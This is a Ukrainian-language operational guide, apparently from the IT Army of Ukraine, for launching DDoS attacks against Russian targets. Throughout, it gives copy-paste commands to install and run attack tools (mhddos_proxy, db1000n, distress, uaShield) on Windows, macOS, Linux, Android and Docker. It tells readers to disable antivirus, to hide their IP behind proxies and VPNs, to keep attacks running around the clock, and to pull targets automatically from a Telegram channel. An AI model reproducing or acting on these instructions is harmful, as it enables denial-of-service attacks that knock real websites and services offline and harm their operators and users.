Інструкції з налаштування DDOS атак на країну ворога

Кожне рішення має свої переваги, тому ми не можемо радити встановити вас якесь конкретне програмне забезпечення. Вам потрібно обрати будь-яке під вашу операційну систему, запустити і можливо спробувати інше і обрати більш комфортне і ефективне саме для вас і вашого заліза.

Тільки можемо порадати краще розгортати атаку на віртульній, хмарній машині (VPS). Так ефективніше і ви не будете при цьому навантажувати свою власну мережу, а також можливо розгорнути безліч віртуальних машин і тим саме збільшити свої потужності.

Низже є 2 вкладки для різних налаштувань:
  1. Варіант через Інсталятор більш кращий через відсутність навантаження додаткового ПО у вигляді Docker
  2. Варіант через Docker
Увага! Перед встановлення ПО вимкніть антивірус. Всі антивіруси визначають ПО для атак, як потенційно небезпече і блокує файли. Вимкніть на постійній основі, бо коли Ви перезавантажите ПК, то антивірус знову почне працювати і видалить файли

Встановлення через Інсталятор

(MHDDOS/DB1000N/DSTRESS)
Завантажуємо та встановлюємо інсталятор - UkITA Installer

Візуалізація покрокового встановлення та запуску

Запускаємо ярлик на Робочому столі, приєднуємося до ItArmy of Ukraine у бородьбі за Україну!


Тут вирішення проблеми

Можливо потрібно буде проігнорувати попередження фільтру SmartScreen

Каталог призначення встановлення повинен містити шлях тільки на латиниці.

Для атак рекомендуємо використовувати mhddos_proxy, у цього способу є декілька переваг, а саме:
  • Не потребує VPN (умовно) - автоматично скачує і підбирає робочі проксі для заданих цілей, періодично їх оновлюючи
  • Атака декількох цілей одночасно з автоматичним балансуванням навантаження
  • Використовує різні методи для атаки і змінює їх в процесі роботи
  • Простий та зрозумілий інтерфейс з іменованими параметрами

VPN

Стосовно атаки з VPN є деякі тонкощі:

Як зрозуміти як краще у Вашому випадку - з або без VPN?

Якщо без VPN у вас більше 15 хвилин стабільно працює Інтернет і скрипт (генерує більше 15 Мбіт/с трафіку в полі "Усього") - вам міняти нічого не потрібно

Якщо без VPN у вас починають тормозити / не відкриватися сайти / пропадає інтернет та/або трафік в скрипті (поле "Усього") менше 5 Мбіт/с - вам варто підключити VPN CyberGhost та перевірити чи буде краще (теж саме поле "Усього")

Додаткові Налаштування (MHDDOS)

Переходимо до каталогу раніше встановленого ukita_installer та відкриваємо для редагування файл runner.bat

Шукаємо строки 35-45 та у разі потреби додаємо необхідні аргументи атаки

        python runner.py --lang UA --itarmy --vpn
      

Детальніше про всі можливі аргументи цікавимось за ЦИМ посиланням.

Discord чат підтримки: UkITA Installer Support
  1. Перейдіть на сайт https://www.docker.com/products/docker-desktop
  2. Натисніть:
  3. Запускаємо завантажений файл «Docker Desktop Installer»
  4. У випадку попередження від системи тиснемо «Виконати»
  5. Залишаємо відміченні прапорці для встановлення потрібних доповнень і тиснемо «ОК»
  6. Чекаємо встановлення всіх пакетів даних (може трошки довго все йти).
  7. Після завершення встановлення погоджуємось з перезавантаженням ПК (тиснемо синю кнопочку):
  8. Коли ваш комп’ютер перезавантажився запускаємо програму
  9. У вікні, що з’явилось встановлюємо прапорець «I accept the terms» і тиснемо синю клавішу «Accept»
  10. Далі потрібно довстановити пакет оновлень для ядра Linux. Щоб ці файли доставити тисніть на посилання вікна, що з’явилось (це вікно не закриваємо):
  11. Або за посиланням - Посилання І тиснемо на посилання для скачування пакету оновлень:
  12. Після завантаження запускаємо файл «wsl_update_x64.msi»
  13. Встановлюємо оновлення (NEXT та далі FINISH):
  14. Тиснемо клавішу RESTART
  15. Очікуємо запуску Docker
  16. Після пропускаємо інформацію про особливості роботи програми. Клавіша “Skip tutorial”
  17. Далі запускаємо командний рядок. Тиснемо на клавіатурі клавіші Windows+R та прописуємо “cmd”. Щоб здійснювати атаку на декілька сайтів можна запускати декілька таких терміналів повторюючи крок 16
  18. Docker команди для запуску атак

    При першому запуску команди відбудеться скачування та встановлення скриптів, потім скрипт почне отримувати проксі-сервера для атак ну і почне свою роботу. За замовченням скрипт самостійно буде оновлювати проксі кожні 10 хвилин, тому нас не зупинити!

    Налаштування

    УСІ ПАРАМЕТРИ МОЖНА КОМБІНУВАТИ, можна вказувати до і після переліку цілей, актуальний список параметрів можна переглянути тут.

    Змінити навантаження: -t XXX - кількість потоків на кожне ядро CPU, за замовчуванням - 1000 одноядерного процессора, у разі двох і більше ядер - 8000

    Для поставки задач з пабліку IT ARMY of Ukraine

    Посилання: https://t.me/itarmyofukraine2022

    Ми автоматизували підтягування цілей. Просто запустіть одну команду і цілі автоматом підтягнутся.
              docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy --lang UA --itarmy
              
  19. Ось та виглядатиме заспамлення сайтів окупантів:
Низже є 2 вкладки для різних налаштувань:
  1. Варіант через Python більш кращий через відсутність навантаження додаткового ПО у вигляді Docker
  2. Варіант через Docker

Інструкція для встановлення софту Python для Ubuntu

Потрібно кожен рядок вводити в термінал почергово, як написано нижче
        sudo apt update -y 
sudo apt install --upgrade git screen python3 python3-pip python3-dev rustc -y
python3 -m pip install --upgrade pip

Далі клононуємо та підготовлюємо до запуску актуальний код mhddos_proxy:

        cd ~ 
git clone https://github.com/porthole-ascend-cinnamon/mhddos_proxy
cd ~/mhddos_proxy
python3 -m pip install -r requirements.txt

Далі переходимо безпосередньо до атак

Для атак я рекомендую використовувати скрипти mhddos_proxy, у цього способу є декілька переваг, а саме:
  • Не потребує VPN - автоматично скачує і підбирає робочі проксі для заданих цілей, періодично їх оновлюючи
  • Атака декількох цілей з автоматичним балансуванням навантаження
  • Використовує різні методи для атаки і змінює їх в процесі роботи
  • Простий та зрозумілий інтерфейс з іменованими параметрами

ВИМКНІТЬ VPN - використовуються проксі, VPN тільки заважатиме!

Налаштування

УСІ ПАРАМЕТРИ МОЖНА КОМБІНУВАТИ, можна вказувати до і після переліку цілей, актуальний список параметрів можна переглянути тут.

Змінити навантаження: -t XXX - кількість потоків на кожне ядро CPU, за замовчуванням - 1000 для одноядерного процессора, у разі двох і більше ядер - 7500

Для поставки задач з пабліку IT ARMY of Ukraine

Посилання: https://t.me/itarmyofukraine2022

Ми автоматизували підтягування цілей. Просто запустіть одну команду і цілі автоматом підтягнутся.

Команда запуску атаки:

        screen -S "mhddos_proxy" python3 runner.py --itarmy
      
Натискаємо Ctrl+A , потім Ctrl+D - ГОТОВО - Атака працює у фоні.
Якщо все успішно буде повідомлення [detached from mhddos_proxy], можна закривати вікно терміналу.


Щоб подивитися які процеси працюють у фоні введіть:
(команда виведе список процесів)

        screen -ls
      

Щоб перейти до процесу та дізнатися як у нього справи (що він виводить), пишіть:

        screen -r mhddos_proxy
      

Щоб знову від'єднатися, та залишити його працювати:
Натискаємо Ctrl+A , потім Ctrl+D - ГОТОВО - Атака працює у фоні.
Таким чином воно буде працювати 24/7 навіть при вимкненому ПК!
Якщо хочете закрити (ВБИТИ) процес - натискайте Ctrl+C

Інструкція для встановлення софту Docker для Ubuntu

Потрібно кожен рядок вводити в термінал почергово, як написано нижче
        sudo apt update 
sudo apt install -y docker.io
sudo systemctl enable docker --now
docker
sudo usermod -aG docker $USER
Нижче це одна команда
        printf '%s\n' "deb https://download.docker.com/linux/debian bullseye stable" | sudo tee /etc/apt/sources.list.d/docker-ce.list ; curl -fsSL https://download.docker.com/linux/debian/gpg | sudo gpg --dearmor -o /etc/apt/trusted.gpg.d/docker-ce-archive-keyring.gpg
      
Продовжуємо. Один рядок - одна команда:
        sudo apt update 
sudo apt install -y docker-ce docker-ce-cli containerd.io screen
sudo systemctl unmask docker.service
sudo systemctl unmask docker.socket
sudo systemctl start docker.service
sudo chmod 666 /var/run/docker.sock
sudo docker run hello-world
Якщо після вводу останньої команди Ви побачили в терміналі напис: Hello from Docker! То Ви зробили все вірно!

Далі переходимо безпосередньо до атак

Для атак рекомендуємо використовувати mhddos_proxy, у цього способу є декілька переваг, а саме:
  • Не потребує VPN (умовно) - автоматично скачує і підбирає робочі проксі для заданих цілей, періодично їх оновлюючи
  • Атака декількох цілей одночасно з автоматичним балансуванням навантаження
  • Використовує різні методи для атаки і змінює їх в процесі роботи
  • Простий та зрозумілий інтерфейс з іменованими параметрами

VPN

Стосовно атаки з VPN є деякі тонкощі:

Як зрозуміти як краще у Вашому випадку - з або без VPN?

Якщо без VPN у вас більше 15 хвилин стабільно працює Інтернет і скрипт (генерує більше 25 Мбіт/с трафіку в полі "Усього") - вам міняти нічого не потрібно

Якщо без VPN у вас починають тормозити / не відкриватися сайти / пропадає інтернет та/або трафік в скрипті (поле "Усього") менше 15 Мбіт/с - вам варто підключити VPN CyberGhost та перевірити чи буде краще (теж саме поле "Усього")

Налаштування

УСІ ПАРАМЕТРИ МОЖНА КОМБІНУВАТИ, можна вказувати до і після переліку цілей. Актуальний список параметрів можна переглянути тут.

При наявності у Вас 4+ CPU та мережі 100+ Mb/s є можливість запуску декількох копій. Для цого додайте правпорець --copies 2

Для поставки задач з пабліку IT ARMY of Ukraine

Посилання: https://t.me/itarmyofukraine2022

Ми автоматизували підтягування цілей. Просто запустіть одну команду і цілі автоматом підтягнуться.

Для Docker:

        screen -S "mhddos_proxy_docker" docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy --itarmy --lang UA
      
Натискаємо Ctrl+A , потім Ctrl+D - ГОТОВО - Атака працює у фоні.
Якщо все успішно буде повідомлення [detached from mhddos_proxy_docker], можна закривати вікно терміналу.


Щоб подивитися які процеси працюють у фоні введіть:
(команда виведе список процесів)

        screen -ls
      

Щоб перейти до процесу та дізнатися як у нього справи (що він виводить), пишіть:

        screen -r mhddos_proxy_docker
      

Щоб знову від'єднатися, та залишити його працювати:
Натискаємо Ctrl+A , потім Ctrl+D - ГОТОВО - Атака працює у фоні.
Таким чином воно буде працювати 24/7 навіть при вимкненому ПК!
Якщо хочете закрити (ВБИТИ) процес - натискайте Ctrl+C

Встановлення через Python (MHDDoS)

  1. Перевірка версії Python3
    • Заходимо в термінал та вводимо наступну команду:

                    python3
                  
      Якщо Python вже встановлено, то Ви побачите текст у терміналі подібний до цього: Якщо встановлена версія python3 не менша за 3.10.0, закриваємо вікно терміналу та переходимо до пункту 2.
    • Якщо у Вас не встановлений Python, або його версія нижча за 3.10.0, переходимо до опису "Встановлення Python 3.10.5".

      Встановлення Python 3.10.5

  2. Встановлення GIT
    • Скачуємо GIT
      (після натискання Вас автоматично перекине на сайт з автозавантаженням через 5 секунд)
    • Після завантаження Вам потрібно натиснути на файл, який завантажився, далі зайти в налаштування, Безпека та Приватність, та натиснути "Все одно відкрити", потім ще раз натиснути - "Відкрити"
      (потрібно буде ввести ваш пароль до розблокування Mac)
    • Все добре, GIT встановлено, переходимо до пункту 3.

      Якщо у вас не вийшло встановити GIT, переходимо до опису "Встановлення GIT через Термінал".

      Встановлення GIT через Термінал

      • Відкриваємо Terminal або будь-який ваш улюбленний емулятор терміналу та встановлюємо пакетний менеджер Brew наступною командою:

                            /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)"
                          
      • Готуємо Brew до використання наступними командами, окремо кожну що з нового рядка:

                            echo 'eval "$(/opt/homebrew/bin/brew shellenv)"' >> ~/.zprofile 
        eval "$(/opt/homebrew/bin/brew shellenv)"
      • Далі, встановлюємо GIT наступною командою:

                            brew install git
                          
  3. Підготовка mhddos_proxy
    • Відкриваємо Terminal та вводимо наступні команди, окремо кожну що з нового рядка:

                    git clone https://github.com/porthole-ascend-cinnamon/mhddos_proxy.git 
      cd mhddos_proxy
      python3 -m pip install --upgrade pip
      python3 -m pip install -r requirements.txt
      Якщо залежності успішно встановляться то Ви побачите текст у терміналі подібний до цього: Все добре, mhddos_proxy підготовлений, переходимо до пункту 4.
  4. Запуск атаки
  5. Далі переходимо безпосередньо до атак

    Для атак рекомендуємо використовувати mhddos_proxy, у цього способу є декілька переваг, а саме:
    • Не потребує VPN (умовно) - автоматично скачує і підбирає робочі проксі для заданих цілей, періодично їх оновлюючи
    • Атака декількох цілей одночасно з автоматичним балансуванням навантаження
    • Використовує різні методи для атаки і змінює їх в процесі роботи
    • Простий та зрозумілий інтерфейс з іменованими параметрами

    VPN

    Стосовно атаки з VPN є деякі тонкощі:

    Як зрозуміти як краще у Вашому випадку - з або без VPN?

    Якщо без VPN у вас більше 15 хвилин стабільно працює Інтернет і скрипт (генерує більше 25 Мбіт/с трафіку в полі "Усього") - вам міняти нічого не потрібно

    Якщо без VPN у вас починають тормозити / не відкриватися сайти / пропадає інтернет та/або трафік в скрипті (поле "Усього") менше 15 Мбіт/с - вам варто підключити VPN CyberGhost та перевірити чи буде краще (теж саме поле "Усього")

    *перевіряти треба з параметрами за замовчуванням:

    ./runner.sh python3 --itarmy

    за потреби python3 замінити на той, який ви зазвичай використовуєте: python або python3.10 або інший (без інших додаткових параметрів)

    Налаштування

    УСІ ПАРАМЕТРИ МОЖНА КОМБІНУВАТИ, можна вказувати до і після переліку цілей. Актуальний список параметрів можна переглянути тут.

    При наявності у Вас 4+ CPU та мережі 100+ Mb/s є можливість запуску декількох копій. Для цого додайте правпорець --copies 2

    Для поставки задач з пабліку IT ARMY of Ukraine

    Посилання: https://t.me/itarmyofukraine2022

    Ми автоматизували підтягування цілей. Просто запустіть одну команду і цілі автоматом підтягнуться.

    Відкриваємо Terminal в раніше підготовленій папці mhddos_proxy та виконуємо команду запуску атаки:

              ./runner.sh python3 --itarmy
            

    Якщо приберете вікно терміналу у трей (не закриваючи його), скрипт буде продовжувати працювати.

Запуск mhddos_proxy на Android

  • За наступним посилання скачуємо та встановлюємо Termux.
  • (при встановленні потрібно надати усі дозволи для програми)
  • Заходимо в Termux та вводимо наступні команди, окремо кожну що з нового рядка:
  • (у процесі виконання команди вам потрібно буде пару разів прописати Y, щоб підвердити оновлення, тому слідкуйте уважно)
            apt update && apt upgrade -y 
    pkg install python -y && pkg install rust -y && pkg install git -y
    pip install --upgrade pip
    cd ~

    Далі специфічно в залежності від архітектури процесора. Але виставлено по пріоритету, якщо Ви не знаєте яка у вас архітектура то спробуйте встановлювати цю зміну перебираючи цей пріоритет до поки запуск атаки не буде успішним.

      Після команди export ... нічого не буде виводитись, але це нормально - воно виконалося!
    • export CARGO_BUILD_TARGET=aarch64-linux-android
    • (зазвичай виходить з цією архітектурою, але якщо буде помилка при запуску атаки - обирайте іншу з переліку нижче)

    • export CARGO_BUILD_TARGET=arm-linux-androideabi
    • export CARGO_BUILD_TARGET=armv7-linux-androideabi
    • export CARGO_BUILD_TARGET=i686-linux-android
    • export CARGO_BUILD_TARGET=thumbv7neon-linux-androideabi
    • export CARGO_BUILD_TARGET=x86_64-linux-android

    Отже, наступна команда повинна мати чітко визначену архітектуру процесора та приведена до наступного виду:
    (якщо обрана не вірна архітектура то при запуску атаки буде помилка)

            export CARGO_BUILD_TARGET=(тут ваша архітектура, що була обрана вище ↑) 
    termux-setup-storage
    (натискаємо: "Разрешить")

    pkg install git -y
    cd ~/storage/shared
    rm -rf mhddos_proxy
    Не звертайте увагу на можливу помилку rm: cannot remove 'mhddos_proxy': No such file or directory, продовжуйте вводити команди.

    git config --global --add safe.directory /storage/emulated/0/mhddos_proxy
    (ця команда нічого не виводить)

    git clone https://github.com/porthole-ascend-cinnamon/mhddos_proxy.git
    cd mhddos_proxy
    pip install -r termux_requirements.txt
  • Запуск атаки:
  • Відкрити Termux через іконку на головному екрані та вводимо наступні команди:

    Заходимо в папку mhddos_proxy:
            cd ~/storage/shared/mhddos_proxy
          

    Далі переходимо безпосередньо до атак

    Налаштування

    УСІ ПАРАМЕТРИ МОЖНА КОМБІНУВАТИ, можна вказувати до і після переліку цілей, актуальний список параметрів можна переглянути тут.

    Для Android параметр -t не повинно перевищувати 1500, а --rpc не більше 1000

    Для поставки задач з пабліку IT ARMY of Ukraine

    Посилання: https://t.me/itarmyofukraine2022

    Ми автоматизували підтягування цілей. Просто запустіть одну команду і цілі автоматом підтягнутся.

    Команда запуску атаки з авто-оновленням:
            TERMUX=1 bash runner.sh python --itarmy -t 1500
          
    Якщо у вас є стабільший швидкий VPN, можна так:
            TERMUX=1 bash runner.sh python --itarmy -t 1500 --vpn
          
    Приклад успішно запущеної атаки: Щоб зупинити скрипт(атаку) треба одночасно натиснути Ctrl та C (англійську)

  • Запуск атаки після повного закриття Termux, щоб почати нову атаку.

    Надалі після успішного встановлення вам потрібно буде робити лише наступні дії:

    1. Відкрити Termux через іконку на головному екрані
    2. Зайти в папку з mhddos_proxy через введення наступної команди:
                    cd ~/storage/shared/mhddos_proxy
                  
    3. Запустити атаку з авто-оновленням:
                    TERMUX=1 bash runner.sh python --itarmy -t 1500
                  
      Якщо у вас є стабільший швидкий VPN, можна так:
                    TERMUX=1 bash runner.sh python --itarmy -t 1500 --vpn
                  

Слава Україні!

Інструкція по встановленню db1000n

Death by 1000 needles

Швидкий старт
    Використовуємо VPN (якщо ви в Україні)
  • Переключіть VPN на Росію, якщо це можливо
  • Не використовуйте Україну як локацию VPN!
  • Будь яка інша країна - теж добре

Для новачків

  1. Завантажте останню версію програми для вашої платформи:

  2. Розпакуйте архів
  3. Запустіть файл з архіву
  4. Усе!

Як обрати VPN


Запуск db1000n


Завантажте останню версію для своєї arch/OS. Розпакуйте архів і запустіть його.


Використання DB1000n через Docker

Якщо в вас є встановлений Docker, запустіть:

docker run --rm -it --pull always ghcr.io/arriven/db1000n

Або, якщо ваш контейнер не може підключитися до локальної VPN:

docker run --rm -it --pull always --network host ghcr.io/arriven/db1000n

Підсиль свою DDoS-атаку у 100 разів разом із db1000nX100

db1000nX100 – продукт на основі популярної української програми для проведення DDoS-атак по росії db1000n, який значно підвищує ефективність атаки (до 100 разів і навіть більше, звідси й X100 у назві)

Як працює db1000nX100?

db1000nX100 автоматично встановлює багато паралельних VPN-з’єднань, на кожному із яких працює окрема програма db1000n. Раз у 15 хвилин відбувається зміна IP-адрес за рахунок перепідключення до інших VPN-серверів. Це забезпечує постійну зміну IP-адрес, з яких ведеться атака.

На яких операційних системах я можу використовувати db1000nX100?

Оскільки програма db1000nX100 є контейнером, вона працює на всіх операційних системах:

  • Windows
  • Mac OS
  • Linux

Доступні образи для завантаження для наступних програм:

Більше інформації про цей метод шукайте тут - Сайт db1000nX100

Ddos інструмент uaShield

Долучитись може будь-хто в кого є доступ до компʼютера — це 1 хв відео з ілюстрацією роботи програми 👇

Все що потрібно лише завантажити, запустити додаток. Технічі нюанси, координацію і відбір сайтів для атаки бере на себе координатори IT Army of Ukraine.

Програму не потрібно ніяк підтримувати, просто відкрийте хоч на цілий день і займайтеся своїми справами. Залишіть стандартні налаштування. Запускати ефективніше лише одне вікно програми, не потрібно відкривати паралельно кілька.

Для Windows
  1. Завантажуємо додаток: UA-Cyber-SHIELD-Setup-1.0.6.exe
  2. Після завантаження може зʼявитись таке або аналогічне повідомлення (залежить від браузера і антивірусів які встановлені) про те, що файл заблоковано. Все нормально, так має бути.
  3. Натискаємо три крапки збоку:
  4. Потім вибираємо Зберегти:
  5. Далі у новому повідомленні натискаємо стрілку Показати ще:
  6. І знову натискаємо Зберегти:
  7. Запускаємо додаток з вікна сповіщення, натиснувши Відкрити файл або безпосередньо з папки Завантаження
  8. Тепер може зʼявитись вікно від Microsoft Defender SmartScreen, в якому треба натиснути Докладніше
  9. А потім Виконати
  10. Після запуску зʼявиться вікно самого додатку. Обидва перемикачі будуть увімкнені автоматично. Їх чіпати не треба, під кожним з них є пояснення. DDoS-атака запуститься автоматично.
  11. Це все. Додаток показуватиме скільки було атаковано разів і ціль, в яку зараз відбувається атака. Можете йти пити каву чи займатися своїми справами 🙂
Для Mac OS
  1. Завантажуємо додаток: UA-Cyber-SHIELD-1.0.6.dmg
  2. Якщо ви використовуєте браузер Safari, у вас може зʼявитись вікно для підтвердження завантаження, в якому потрібно натиснути Дозволити
  3. Знаходимо файл в завантаженнях і запускаємо його
  4. Зʼявиться наступне вікно. З нього запускаємо додаток.
  5. Далі зʼявиться таке попередження. На ньому натискаємо ОК:
  6. Після цього відкриваємо Налаштування системи:
  7. Там знаходимо налаштування безпеки і відкриваємо їх:
  8. На вкладці Загальне шукаємо внизу наш додаток і натискаємо збоку кнопку Відкрити:
  9. Потім додатково потрібно підтвердити дію за допомогою паролю або Touch ID.
  10. Після цього повторно зʼявиться попередження. Натискаємо Відкрити:
  11. Після запуску зʼявиться вікно самого додатку. Обидва перемикачі будуть увімкнені автоматично. Їх чіпати не треба, під кожним з них є пояснення. DDoS-атака запуститься автоматично.
  12. Це і все. Додаток показуватиме скільки було атаковано разів і ціль, в яку зараз відбувається атака. Можете йти пити каву чи займатися своїми справами 🙂

DDOS-інструмент DISTRESS

Панове, запрошуємо до тестування нової ддос тули

https://github.com/Yneth/distress-releases/releases

вона використовує проксі, так що за свій айпі можна не боятись.

Цілі автоматично підтягуються з itarmy.

На тестовій машині забирає весь трафік - 400мбіт.

Встановлення

Для Mac OS
wget https://github.com/Yneth/distress-releases/releases/latest/download/distress_x86_64-apple-darwin
chmod +x distress_x86_64-apple-darwin
./distress_x86_64-apple-darwin -c 2048

Для linux
wget https://github.com/Yneth/distress-releases/releases/latest/download/distress_x86_64-unknown-linux-musl
chmod +x distress_x86_64-unknown-linux-musl
./distress_x86_64-unknown-linux-musl -c 2048

Для Windows
Завантажте та встановіть софт

Якщо запускати під впн, то потужностей з проксі не буде. Для цього використовуйте прапорець

—use-my-ip 100


Якщо в вас є встановлений Docker, запустіть:
docker run --rm -it --pull always ghcr.io/yneth/distress
Якщо у Вас не вистачає навичок або немає можливості використовувати попередні інструкції, але є велике бажання та інтернет - скористайтесь одним із веб-сервісів для ддос-атак:

Не забудьте використовувати VPN!

Список VPN:

Гармата Tashiro

Атака за допомогою 50 iframes для автоматичного оновлення кожної адреси URL щосекунди!
(щоб збільшити потужність атаки потрібно задіяти спливаючі вікна!)

Відкрити сервіс: Tashiro Weapon

Разом до перемоги!


Список VPN: